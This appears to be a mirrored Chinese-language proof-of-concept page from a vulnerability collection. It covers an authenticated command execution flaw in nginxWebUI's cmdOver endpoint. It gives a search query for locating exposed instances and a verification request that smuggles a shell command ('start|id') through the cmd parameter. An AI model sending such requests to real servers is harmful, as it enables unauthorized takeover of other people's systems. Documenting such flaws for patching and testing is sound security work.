mirror of
https://github.com/Threekiii/Awesome-POC.git
synced 2025-11-05 10:50:23 +00:00
35 lines
501 B
Markdown
35 lines
501 B
Markdown
|
|
# nginxWebUI cmdOver 后台命令执行漏洞
|
||
|
|
|
||
|
|
## 漏洞描述
|
||
|
|
|
||
|
|
nginxWebUI 后台存在命令执行漏洞,攻击者登录后台后可以执行任意命令获取服务器权限
|
||
|
|
|
||
|
|
## 漏洞影响
|
||
|
|
|
||
|
|
```
|
||
|
|
nginxWebUI
|
||
|
|
```
|
||
|
|
|
||
|
|
## 网络测绘
|
||
|
|
|
||
|
|
```
|
||
|
|
title="nginxwebui"
|
||
|
|
```
|
||
|
|
|
||
|
|
## 漏洞复现
|
||
|
|
|
||
|
|
登录页面
|
||
|
|
|
||
|
|

|
||
|
|
|
||
|
|
|
||
|
|
|
||
|
|
验证请求包
|
||
|
|
|
||
|
|
```
|
||
|
|
POST /adminPage/remote/cmdOver
|
||
|
|
|
||
|
|
remoteId=local&cmd=start|id&interval=1
|
||
|
|
```
|
||
|
|
|
||
|
|

|